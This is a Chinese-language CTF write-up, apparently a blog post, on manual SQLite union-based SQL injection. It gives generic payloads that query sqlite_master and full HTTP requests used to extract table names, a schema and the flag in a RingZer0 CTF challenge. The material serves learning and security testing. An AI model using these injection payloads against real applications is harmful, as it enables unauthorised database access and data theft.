HOME
HOME

sqlite注入

2020.11.10 le31ei Pentest  热度

sqlite手工注入基本跟mysql一致,只是函数没法通用,查库名和列名不一致

sqlite数据库中只存在sqlite_master和当前数据库。

查询当前表名

1
index.php?id=1 union select 1,name,3,4 from sqlite_master where type='table' limit 0,1

查询列名

1
index.php?id=1 union select 1,sql,3,4 from sqlite_master where type='table' and name='flag'

题目解析

https://ringzer0ctf.com/challenges/40/?id=MQ==

该题目对id做了base64编码,存在sqlite注入,题目提示,id可以用)进行闭合。

image-20201110151126659

查询表名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /challenges/40/?id=2) union select name,2,3 from sqlite_master where type='table' limit 0,1-- HTTP/1.1
Host: ringzer0ctf.com
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

image-20201110151309780

查询列名

查询结果是创建表的语句

1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /challenges/40/?id=2) union select sql,2,3 from sqlite_master where type='table' and name='flag'-- HTTP/1.1
Host: ringzer0ctf.com
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

image-20201110151358910

最后即可查询出来flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /challenges/40/?id=2) union select content,2,3 from flag limit 0,1-- HTTP/1.1
Host: ringzer0ctf.com
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

image-20201110151430788